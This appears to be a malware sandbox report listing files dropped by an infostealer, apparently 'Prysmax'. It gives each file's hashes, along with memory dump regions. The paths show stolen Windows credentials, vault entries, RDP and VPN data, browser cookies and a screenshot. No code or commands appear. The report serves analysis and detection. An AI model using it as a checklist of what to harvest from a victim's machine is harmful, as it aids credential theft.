7c0c735389a6bdde2ce878c4d9f60c3f3eb327ff4247711756ad5927e294d604ffca12235daab6d0f2a61b10b8ef669e1c7a452bf604fca810d5bfd91d2da1b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe

Filesize
1.2MB

MD5
7d842fd43659b1a8507b2555770fb23e

SHA1
3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

SHA256
66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

SHA512
d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe

Filesize
2.2MB

MD5
fb5b1e8b265d9d1f567382122ad9aeb0

SHA1
d79d1fe809aa7f6ddafdc08f680def84f4dd8243

SHA256
e4211d0e545311bb60f65f15404c590ce1a0ef4db12ce470e492d7975d3e7b6d

SHA512
76d6f9c485f1fc64cdc08c26454ec85bdea0e2304de9676a8db0fe5fccc5fa96e220ec57080214bf1aeffa815c7ae9af12f1cc0cb46782d514d0a4baee5441b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413710101\50702d4ef9.exe

Filesize
1.8MB

MD5
cd83a6a8995412741ba83cd2ec46cd25

SHA1
474b6f7038c2095e9d9cdaec4448f1358f646a0a

SHA256
afd5b080f380c6181252c95da91e8bf22f8febfa11340bf967f6ab5d2b887495

SHA512
70679001b9519d44b4b0567182054cf94bd7dca6de404ef81c5ad4c171f11de6ae973b387bfcf47172da0a6ff9c1d249b0a37dc5fecbb3f4fba12b46627303c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413730101\TbV75ZR.exe

Filesize
2.1MB

MD5
88796c2e726272bbd7fd7b96d78d1d98

SHA1
b359918e124eda58af102bb1565c52a32613c656

SHA256
85fa677d5892fe5c794eb9d0e51dd317b8d898e97c49a9a1c4875417c0147556

SHA512
71a2c25af532942b5676eb0274ed7dcd75c6a4ce69d3bd9541f162d466abb7be299394111a718774884c3cde8518b11fb926343f93a06853433664065510280c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe

Filesize
1.9MB

MD5
f88e81846f7e7666edb9f04c933fd426

SHA1
80dae46a3c2c517b4c1b5d95228b0d5dcfa65359

SHA256
c8cb3ae4287b10d16c5557b47a6ad9220f097f5449da1c4e575a8194219806d3

SHA512
c86b57f648069d31f2ef3bfddc5cb9f36698e113d52966f4b060c5f0212c5a87331d34ca32f04ea5655d79e8e7e7c17f763ac70b07b0558fb87ff8ef54861c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413750101\p3hx1_003.exe

Filesize
1.2MB

MD5
a06b6ca8d9a307911573389aee28fc34

SHA1
1981c60d68715c6f55b02de840b091000085c056

SHA256
cce36fa950470b05beb043a273be6ddc93c55550d1e7ee1472cf807e2c87887c

SHA512
3a8fb1466bff7806dddc88764a5f02db18f77a32e2dd4de3168130a7b3c8c552f97f60766805b0050634d5100c190dbf56e1e3340c424f091c6299410c85fc89

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413760101\Rm3cVPI.exe

Filesize
354KB

MD5
27f0df9e1937b002dbd367826c7cfeaf

SHA1
7d66f804665b531746d1a94314b8f78343e3eb4f

SHA256
aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

SHA512
ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413780101\6862027c44.exe

Filesize
2.1MB

MD5
8b7a6718ca74360fe9f51999563d5bd4

SHA1
bba0641bc9c1360d8df011c5ad99d648536fd2a2

SHA256
bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d

SHA512
3b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413790101\0ee5eb4d4c.exe

Filesize
716KB

MD5
57a5e092cf652a8d2579752b0b683f9a

SHA1
6aad447f87ab12c73411dec5f34149034c3027fc

SHA256
29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

SHA512
5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413790101\0ee5eb4d4c.exe

Filesize
358KB

MD5
e604fe68e20a0540ee70bb4bd2d897d0

SHA1
00a4d755d8028dbe2867789898b1736f0b17b31c

SHA256
6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

SHA512
996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

Download Submit
C:\Users\Admin\AppData\Local\Temp\10413800101\71da115e9e.exe

Filesize
1.8MB

MD5
57c18d2f9657dc81e4dd96a93c830ecd

SHA1
2481d2693019898c05330848a0817598ed5ee463

SHA256
2bb445ad5df756cebcd2668a728de6cbd596ec1fdd4f313fc2fdcfd219030e6e

SHA512
53f341bb9b27577b41c5d11a2b90d423394f5e0b515d32d0f6c94605dce8837fa3767328598521144b2a154eaf1c9a11429e535f9ef55eae0c1048be0b230709

Download Submit
C:\Users\Admin\AppData\Local\Temp\261.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com

Filesize
1KB

MD5
dcb04e7a3a8ac708b3e93456a8e999bb

SHA1
7e94683d8035594660d0e49467d96a5848074970

SHA256
3982552d9cd3de80fadf439316699cbc6037f5caa45b0046a367561ff90a80d5

SHA512
c035046cfc752883afecdc1efd02a868cf19c97b01b08e3e27606ffedb3a052b14637f51cd6e627928660cd76d31f15dbd9a537446fc5f4a92537874a6dcd094

Download Submit
C:\Users\Admin\AppData\Local\Temp\Asbestos

Filesize
88KB

MD5
042f1974ea278a58eca3904571be1f03

SHA1
44e88a5afd2941fdfbda5478a85d09df63c14307

SHA256
77f4020549b3bcb36ce3e7701cc5831cc0a0f191420997d76701310eb48c6346

SHA512
de2b302b85513d4a6e01aa2e082f8e04481e81aaa5fbd4e419a0055bea45b2db2865dca249b74445b86cf255fbab920050609bbfd75fd166f0bbaecb0894e0e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Badly

Filesize
73KB

MD5
24acab4cd2833bfc225fc1ea55106197

SHA1
9ba3c2e0107de2ac6b3e816e37f9b1a58ca048cb

SHA256
b1095cd77ed823f083295b308bd1ba946c7bd64cea6a5259165389455a64c84e

SHA512
290583f3ddb0a85a96b7fc2e334bef708fb22c36e633e6b5c544cf7e5d4412441ef275614e36c8f3411b620eb108319ce8673a1fdd7ee24a6179cf6c64ae3ed7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Compilation

Filesize
1KB

MD5
f90d53bb0b39eb1eb1652cb6fa33ef9b

SHA1
7c3ba458d9fe2cef943f71c363e27ae58680c9ef

SHA256
82f3a834cf8c77a0ccfb7c70d1254336ce229720bc6cb01235c66e5429832caf

SHA512
a20a1812a35a8e42cfb04df4e0f2a86703c70ba658f54595447f7bf3f7c2462d283d9f7211d4494adbe44e801c8d5175d4fe73e5b27de7222da815c7a3bb35af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Expectations.cab

Filesize
25KB

MD5
ccc575a89c40d35363d3fde0dc6d2a70

SHA1
7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

SHA256
c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

SHA512
466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

Download Submit
C:\Users\Admin\AppData\Local\Temp\F211.tmp\F212.tmp\F213.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Jpeg

Filesize
52KB

MD5
e80b470e838392d471fb8a97deeaa89a

SHA1
ab6260cfad8ff1292c10f43304b3fbebc14737af

SHA256
dbf854821fb7f009e5babdc60be4a82b4c2992831a87cc8c09a3ca8d03bd4a1d

SHA512
a36c9612dcb97d84a01fa0423d35a87b980d635a92c4c3bc04ae6dc73cc04b8fd6d5e92ebfbba074c9cb2c2a0c14c3f0e5cb0c89c03c30f87c719e89929f7975

Download Submit
C:\Users\Admin\AppData\Local\Temp\Leon.cab

Filesize
479KB

MD5
ce2a1001066e774b55f5328a20916ed4

SHA1
5b9a7f4c7ce2b4a9a939b46523b6ae92498b3e3e

SHA256
572464ff91ca27c09a4635bbed4d10f33a064043dc432139ab94f78761cca1dd

SHA512
31d189c610cba57a75efd8512b88eebcff99368f71fa62418f2efc897b79eddcffb9e21c2c5297b030b3d5d645422ce2c533c3d5949e724409aefa8011c943f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\LlO6hk3Ax.hta

Filesize
717B

MD5
359348b18a5694435615e2d8fb548c57

SHA1
d2e60a80e1d2803c3585439139943506242d417a

SHA256
986ae9012f89eb4be0926850e144444227edb1e00c0f4eaa61d3cf6ebbf101c8

SHA512
1e8cc34884ed4a853658642ab2dd98112df0c778761a98070c6b6aedfc89e07f3adfac5a49964ea6674a8003888d448f87911901f9f7fee8c35f129f5d9ba5a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\New

Filesize
92KB

MD5
340113b696cb62a247d17a0adae276cb

SHA1
a16ab10efb82474853ee5c57ece6e04117e23630

SHA256
11beb48f02d982f3058efdae31595a46659e09dd1a9ded9b0053d482c2e7a5f0

SHA512
a91423a326e0dc374dba096e8e4af9142a4ec6633f86d1242533ca76a6a45983d3b0d48f64ea2053caf5599e4aa6122e06517e11b8c4a5474fad824d62652a98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Playing

Filesize
136KB

MD5
7416577f85209b128c5ea2114ce3cd38

SHA1
f878c178b4c58e1b6a32ba2d9381c79ad7edbf92

SHA256
a4fd52821a0570e982367234423e291e522cfb5199eae264c823e1bb84f5bbc1

SHA512
3e5fb8937489abf97d788942d1be012db30fc19aaaffb0ac76c55ccbd64d0826545c17293d0bf5eef2a0416bd847243d788998bd4a76e758ac054a01795a0f88

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax.zip

Filesize
4.5MB

MD5
8972b1cec1b736beef8cb7a20c3db998

SHA1
8741f99a133eda55fcfd7303611be6ed5e35bda0

SHA256
6712f07562c4a21e620bca955c3c465fcd4759021c177acf58330acca7f7c5ec

SHA512
e13965ec4001fdef3afdeb71e876cd8eaa6be92a08178ca428dc8707da2d5a321d23070181e0e03d134593085470d7592d480949348ee5a4f064ba5918bbda6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\CREDHIST

Filesize
24B

MD5
d63149109d120a64a9474d325132740a

SHA1
01f8160230c06c91522d5961116988684e488770

SHA256
fbeef450007e902d2b219659b07c431eeea44adc516984b29277ba704888bb8a

SHA512
abe03bcb08c369f9412210801cefb04ce495fd18afdfc8587d607698a27e2d3594f0fa333d99817380e44caced55224e6cc41559461f44d2d509ce35e9d4d44d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-446031748-3036493239-2009529691-1000\5139f7ae-0d45-4485-871c-ea1a9aae9a1e

Filesize
468B

MD5
2f06239145b147ee501f7b333cf445d2

SHA1
9752249a08c0df7d6551c101dbc7d36749270d4e

SHA256
85456cd8f7b496dd608a6d395d8e7a2ee938f1c2d5c4f6929bfbd332e1a6ebd4

SHA512
ff1a1a1cbc2160dde03a3356b73ab96f231287dfa2596b5203efc3a3631c4d12dc95b6759b6a54641361d717045011ac950153a75717e8479bfbf5866f8d9ce2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-446031748-3036493239-2009529691-1000\Preferred

Filesize
24B

MD5
b48e8890a3d4950ac593cd58fc06082f

SHA1
ddd088c291e231d8dc99f72bc7de0d3d2bc07d6b

SHA256
1699e271148cd5bffaab85054f7b2a5f2a269a6788663a5b29e67f22b747d188

SHA512
43c15bae9025a2b0b6478707974b2baa305d34307e7693894929b4b968459091cab3c7665792919745cd0521735ebe06e7ec6cf454206018a999f927730f8327

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_2\DFBE70A7E5CC19A398EBF1B96859CE5D

Filesize
10KB

MD5
1889f7511e7509ce0bc42bbf343ac8ad

SHA1
944e88d4676a0aeccc8c53c29bd79dadb889387a

SHA256
ce3124e81d9412ac8792d895c1b02a972645c20f9de252540e37d25b47f201ba

SHA512
6b60a4ce91aaaf7e5a160d87b900ede1671b42e32d13867bdaaa9c4c6e46cd942ebc7f176728d47ac8594eddfdf042bc47e31b2694267463e5de1b07a00b36c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\RDP_Sessions.txt

Filesize
499B

MD5
13ad7335611fcfb88efa3590a11f2212

SHA1
ae8de55bb91229e0e3e082697c2ffa877340c437

SHA256
1f93e1567b7b8ddcf5db5ea670eecf1ce717ce72346bb28c131be218f25bf8ed

SHA512
14e5393c6ad833c222d9f883006891190ce5811d484be079b820beb10fda99a8b0ec9c2470a091c8f0b118f5319b5425517849a50e72ed3c753beeba0132dc82

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\cmdkey_list.txt

Filesize
310B

MD5
6ae83fb929135040af23bea2e3668573

SHA1
0589cce9c5427445684fc6d640933382280f6248

SHA256
78e22326ff74eb686f205979d129b5b7b56e689f36cfec5fc9ffd9cca76fa959

SHA512
b6d9d5ef20a413b6a619a0607d45ae7b5f05b6df1877a60a35bdf2d2bf7642404bd4c5d89cbfc0c42cfcedec1315be24565f52f161ad74b87e91186b7a678401

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\windows_vault.txt

Filesize
336B

MD5
da510ee1496286415109f3ec58d6123c

SHA1
8886a1786606d8f5d693a6e87fef39054bd022af

SHA256
82c3ed7cb28a633ba026353c6349e8305423e5e1202f8c6030ec1b8706932e73

SHA512
f2b5b6e278e6a91e92d0dc296e7837c3d486505a23fe3f574a5c56735a369e30c06942a2695f09a110884d7988b512f02d9a599b82b6abe9bdb3f0e8d8286b77

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\ConnectedDevicesPlatform__connected devices platform certificates.sst

Filesize
654B

MD5
10413618f73684e3d77e0fcd6bf81075

SHA1
f6a9f8358ea649f9b5e566fce69d2b635d38f72b

SHA256
489932a1d8dd9e66dbee55a88a295378215474eedace35e7d56efa3ba654d97a

SHA512
1f37bd0ba4e3c2b1d1e263722d15d03423c2b83f4fa5ba02b99e88337a91b984ef795d25796550269844365f3e349e5945e9b76b8f2bae94eb43fa75be0adfec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__connectimport.doc

Filesize
807KB

MD5
3bebb5276f18bc73fb13ebac096776bc

SHA1
c98da8f8efc636c01e93ffda47e1a37c5e9a23a1

SHA256
c7a9a710d7e99a768ebe61ebd940126eb17d1f60fe1e3593a0f8da64bbdcfa3e

SHA512
225d8643dfdad7c0fb1f301a4649cbc93b8325464f02e5e82df8e75d56469f411200e10ba08280471e4db31ef5fdf1d94fa71e3fa47bed6177c5323238b3d9fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__removeconnect.html

Filesize
407KB

MD5
d73a6ee1ae9e30ecb47de89665d334ed

SHA1
173e71c24a4dc4d7810dbbcecf816ae7dcaaadfc

SHA256
6c1664d13a7fbd39819d65d8085f4400c5d51ae314a01c8d8e5674f77beec82f

SHA512
45ebc582730a1ac565ff767d85368d2aa86ad5d43a8d2f5652d1b3053f92ab16651e50a18b7378f22aec2983377f52513c853804c344e2c6e7368e7b5c3b9cf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__disconnectclose.xlsm

Filesize
782KB

MD5
a06b5c724fec2eab9886085ef2b6c055

SHA1
81511d93470672d785f1c4b24de03aa66c7dae27

SHA256
ffa677c4f333a1d850bdca6345c7fec2d0fd672c08c4681364a776f20e4b5488

SHA512
1a7d947fcd88e899caf55736be697b7537834514930b76b3870cfa32c76ebbdb4be3d1526ab2f8e1ed7cafdf9587e8346d102b176a545d006ad107c0b3cf0768

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Roaming__connectjoin.m2t

Filesize
734KB

MD5
6643306922a61eb3f559534a411e6b49

SHA1
f3b5c17a8be578ae4a8a3e10d429473ba1a52264

SHA256
ecdd4872bbec47ad193ad8149fad128407d2efa971a33166d66626d6e6f233a5

SHA512
b04939000fde175fb1cf071932429752c09e61ca98251753797632df8e70c3da11e1d6cd3bf42cc358b9320bd4881c0b977ee990a6d9e62015ce9d365671a93b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Roaming__connectstart.xla

Filesize
853KB

MD5
dd611767ae744fd66471c055e686f7bf

SHA1
b75d29aba767737f192acd48d97756d96efd7e49

SHA256
6df1791ad7bdee9c16df15d69cda1a0c91e74d392ca481f3a201b1168ee8b750

SHA512
ed14c2a5846df5ac22151aca24bd34c8e1f40bdf534672e3c7990f22332048c51dd0b81264a2ce8b5ebfbad260ac624211e9592faaaba708655e5feb35176bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Roaming__revokeconnect.avi

Filesize
655KB

MD5
286309c2679123822d1359682111554f

SHA1
3e2e995913d4eb7c02dbb0391c78667af3e6ca59

SHA256
286318b97de0e565253e5ad19b30658325414f6aaf4dd76a4719b41b065dee65

SHA512
8262b88fcae24cad1f0ab7893f6510479918d7aa768acd6d5fea9717dbaea7acb1aef3138b663faae5d7179ef4c7cf8e3d590880b5fc1db672bd0793db595802

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Searches__winrt--{s-1-5-21-446031748-3036493239-2009529691-1000}-.searchconnector-ms

Filesize
855B

MD5
d622601c8e30e4140cf449bf4edc3a50

SHA1
6fb24cb7e1c7f8fd21804d7addb485d6d6c58961

SHA256
4fe5d2b0d01991d3533f1eac4e9987f580192c4344212f3045355c0520aa120d

SHA512
66869377f1be4520b37fbeccff38196c51bccf7501ebfff19e2c0b6717ea7e68f0bb41537331f8ef5110746f0ba3fe91c61a95dda89e188b4cef6068fadaa848

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\WindowsVPN\windows_vpn_connections.txt

Filesize
862B

MD5
ac9b930e233d016346ff67d6a3f5a9e6

SHA1
fcf0e44ae5b569708eeef45826e2f46e611a8eee

SHA256
7fb38f1012513704aae95eb7f8cd64c3413f1e64609aa0ec59faa7698330487c

SHA512
7188664b63c0538f184225846df1e4ed50f724a9f1fd87c93b341fa107b705b2459afb1632f5e0205938ea0a6535d86e59a440c042e76bf616b3c230113b03d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Certificates\personal_certs.txt

Filesize
65B

MD5
8314c362164d829cb812467c333662a0

SHA1
3ae5f774269aaa4fdeaf4e5eb78b7a6f7625ab97

SHA256
354644ecf4d6b3ac97c0187d8581bb82cdb8caf8e438755b998c5df0f7fd85ac

SHA512
7b32320a2bc82f69a7470168d4515d1fbe1f44ed03f4f30330870732e6c7eec771104bc59a1f9486f4e82e869e1f2b9d84507a976ca5fcd511fdf9e5e1f2b3e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Cookies\Prysmax_Cookies_chrome_Default.txt

Filesize
306B

MD5
69930314904cfeac5dd82eede8bcecfe

SHA1
ccee42d43de36a296f7b1ed5a4e8a6c5365e4d44

SHA256
f4b4e2f219ffbd54a9ca596c62a2df67aad3a7c90e49c74159237c43afe01133

SHA512
0ffbfa877d62acb611bd97439202fd351c9cfc381ab685c1e4107e39cdf944d062ca6013407e803f89f7db74bfd1f91a5e42a7df422dc78601b2d7028e264094

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Cookies\Prysmax_Cookies_edge_Default.txt

Filesize
2KB

MD5
4c8a8146734e2472052a7cde8de8dbca

SHA1
39c11102f396c61bfe772b806ccee713cf9745e8

SHA256
dfb3e789fd9e5428adf6645be421528cef6315cebcd2d070a2d699e3821cbea5

SHA512
c62257ec0dc6de69ebc626269004e3318075a137fde422f470ad8f3d18fe8d300a2dc30e98d272c466308fa4ab386d1b2ca974e6d3b71ea4851246e8d9cfcbe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\Cookies\extraction_log_20250402_024713.txt

Filesize
9KB

MD5
9cefd5849b97f41a6fb3df13909a1216

SHA1
b560fb3e8775d802576ee632eca5fa11c64395be

SHA256
d8920d35be0cfa23093fcf580464fb8a317e2f4c3f9bf0fb3276578b7935ac3c

SHA512
2f7d18929d3f1c52449d1c5168dab134caa693ede7a4ff1d70843cea1f8d6f5217e1e8cdf8f5a694fdd40e62685ed2edfd821d83211a0ac220b078a1c335844c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Prysmax\screenshot_20250402_024707.bmp

Filesize
3.5MB

MD5
c0ef22e0f5d11cd3deb45258db776834

SHA1
5b48f9258a9f85cb36b66c73e0c2a663bb16d8e3

SHA256
c16b9d35dfd5d21bd97c6faffee8ef29072f17b7e36ef083b83f3a300d2a7ac2

SHA512
8526d4e25f9f16bcb976dbf3609ffced09d4f4de690364ac733aaa5608dcc1acf19f39740211ed3a8bb54f01589fb09ca54f3fd732f482eff1d192f515846d90

Download Submit
C:\Users\Admin\AppData\Local\Temp\Realized

Filesize
72KB

MD5
aadb6189caaeed28a9b4b8c5f68beb04

SHA1
a0a670e6b0dac2916a2fd0db972c2f29afe51ed3

SHA256
769dbc3b8179254495f8d57074632c906d98179de9defac81d971f3f086a3c43

SHA512
852017d2f393ca2f66b12ea0d992697207554222fe2886040f69055b58f3764b3e3792d5e993b97aab1e12f09c9c61eb4ac40aad0eb54fbe47de256ba4ef6fbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Seeds

Filesize
78KB

MD5
4a695c3b5780d592dde851b77adcbbfe

SHA1
5fb2c3a37915d59e424158d9bd7b88766e717807

SHA256
3deeecce6b1211d5dfb88b0f0f9ab79c8c7570776b234a61446f42386f6286ed

SHA512
6d0024958ee42f2d689d805be29dc68217fe09cef10244a226a2976f49ca3b661112c3a04109edae538e03766a24b7bc371affd6bc1aaed5481fdee883a85970

Download Submit
C:\Users\Admin\AppData\Local\Temp\Uw

Filesize
59KB

MD5
0c42a57b75bb3f74cee8999386423dc7

SHA1
0a3c533383376c83096112fcb1e79a5e00ada75a

SHA256
137b0f0785a75e269fa9a61283a98bdf5291dd474d954d747dfe29b7e35b8fe8

SHA512
d6d79cf9c312c4bb76fef6499ae278b287196fe056a542da8be6ff7818f0d8a53d78c6af9c49e27c81fcb58c3c8d261f631212020a6f8f8b44bed682a959279c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jlgztwj.ayr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ff_bookmarks_tmp_2101961523.db

Filesize
5.0MB

MD5
c883d7edf377eb6eaff5a5c30733c22d

SHA1
e972f0a055af89651c975835130ac5ab3b09629e

SHA256
2e38e989d241f901628e16707652df95643b3fe9f05e3e0d487540a824a0ed63

SHA512
236863317c3d03bd42da54145df3e8c5b4c2f486002c404fea6d640833b926169b22c17eb3220b0d4f63818f015392552c380586174a07f6ce88520fafe9a7c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ssisd.sys

Filesize
15KB

MD5
b69f744f56196978a2f9493f7dcb6765

SHA1
3c9400e235de764a605485a653c747883c00879b

SHA256
38907d224ac0df6ddb5eb115998cc0be9ffdae237f9b61c39ddaeda812d5160d

SHA512
6685a618f1196e66fe9220b218a70974335cdbf45abf9c194e89f0b1836234871eb27cbf21c3fcaa36ae52d38b5de7a95d13d2ec7c8f71037d0f37135ddcbaf5

Download Submit
memory/112-2009-0x00000000007D0000-0x000000000084B000-memory.dmp

Filesize
492KB

Download
memory/112-1812-0x000000006E590000-0x000000006E821000-memory.dmp

Filesize
2.6MB

Download
memory/220-241-0x0000016D41C30000-0x0000016D41DF2000-memory.dmp

Filesize
1.8MB

Download
memory/400-1760-0x00000000073C0000-0x0000000007463000-memory.dmp

Filesize
652KB

Download
memory/400-1750-0x000000006FC80000-0x000000006FCCC000-memory.dmp

Filesize
304KB

Download
memory/400-1770-0x00000000078E0000-0x00000000078F1000-memory.dmp

Filesize
68KB

Download
memory/400-1780-0x0000000007940000-0x0000000007954000-memory.dmp

Filesize
80KB

Download
memory/1284-1808-0x0000020BF2350000-0x0000020BF235A000-memory.dmp

Filesize
40KB

Download
memory/1284-1807-0x0000020BF2330000-0x0000020BF234C000-memory.dmp

Filesize
112KB

Download
memory/1956-2075-0x000001C5BD280000-0x000001C5BD288000-memory.dmp

Filesize
32KB

Download
memory/1956-2076-0x000001C5BD3F0000-0x000001C5BD3FA000-memory.dmp

Filesize
40KB

Download
memory/1960-108-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/1960-97-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/1984-1905-0x00007FFC82710000-0x00007FFC82905000-memory.dmp

Filesize
2.0MB

Download
memory/1984-1904-0x0000000001100000-0x0000000001500000-memory.dmp

Filesize
4.0MB

Download
memory/1984-1902-0x0000000000BE0000-0x0000000000BEA000-memory.dmp

Filesize
40KB

Download
memory/1984-1907-0x0000000077000000-0x0000000077215000-memory.dmp

Filesize
2.1MB

Download
memory/2900-127-0x0000000007B80000-0x0000000007B88000-memory.dmp

Filesize
32KB

Download
memory/2900-123-0x0000000007A50000-0x0000000007A61000-memory.dmp

Filesize
68KB

Download
memory/2900-122-0x00000000078C0000-0x00000000078CA000-memory.dmp

Filesize
40KB

Download
memory/2900-125-0x0000000007A90000-0x0000000007AA4000-memory.dmp

Filesize
80KB

Download
memory/2900-121-0x0000000007710000-0x00000000077B3000-memory.dmp

Filesize
652KB

Download
memory/2900-124-0x0000000007A80000-0x0000000007A8E000-memory.dmp

Filesize
56KB

Download
memory/2900-120-0x00000000076E0000-0x00000000076FE000-memory.dmp

Filesize
120KB

Download
memory/2900-110-0x000000006FC80000-0x000000006FCCC000-memory.dmp

Filesize
304KB

Download
memory/2900-126-0x0000000007BA0000-0x0000000007BBA000-memory.dmp

Filesize
104KB

Download
memory/2900-109-0x0000000007680000-0x00000000076B2000-memory.dmp

Filesize
200KB

Download
memory/2988-135-0x000000000D650000-0x000000000D69E000-memory.dmp

Filesize
312KB

Download
memory/2988-131-0x000000000CE80000-0x000000000CE8A000-memory.dmp

Filesize
40KB

Download
memory/2988-94-0x0000000007B00000-0x0000000007BF8000-memory.dmp

Filesize
992KB

Download
memory/2988-88-0x0000000005F50000-0x00000000062A4000-memory.dmp

Filesize
3.3MB

Download
memory/2988-90-0x0000000006510000-0x000000000655C000-memory.dmp

Filesize
304KB

Download
memory/2988-153-0x000000000DCE0000-0x000000000DCF2000-memory.dmp

Filesize
72KB

Download
memory/2988-92-0x00000000078A0000-0x0000000007932000-memory.dmp

Filesize
584KB

Download
memory/2988-129-0x000000000CB80000-0x000000000CCD4000-memory.dmp

Filesize
1.3MB

Download
memory/2988-130-0x000000000CCF0000-0x000000000CD0A000-memory.dmp

Filesize
104KB

Download
memory/2988-134-0x000000000D480000-0x000000000D642000-memory.dmp

Filesize
1.8MB

Download
memory/2988-132-0x000000000CFD0000-0x000000000D020000-memory.dmp

Filesize
320KB

Download
memory/2988-154-0x000000000DD40000-0x000000000DD7C000-memory.dmp

Filesize
240KB

Download
memory/2988-133-0x000000000D0E0000-0x000000000D192000-memory.dmp

Filesize
712KB

Download
memory/2988-93-0x0000000002F40000-0x0000000002F48000-memory.dmp

Filesize
32KB

Download
memory/3016-1716-0x0000000003AD0000-0x0000000003B34000-memory.dmp

Filesize
400KB

Download
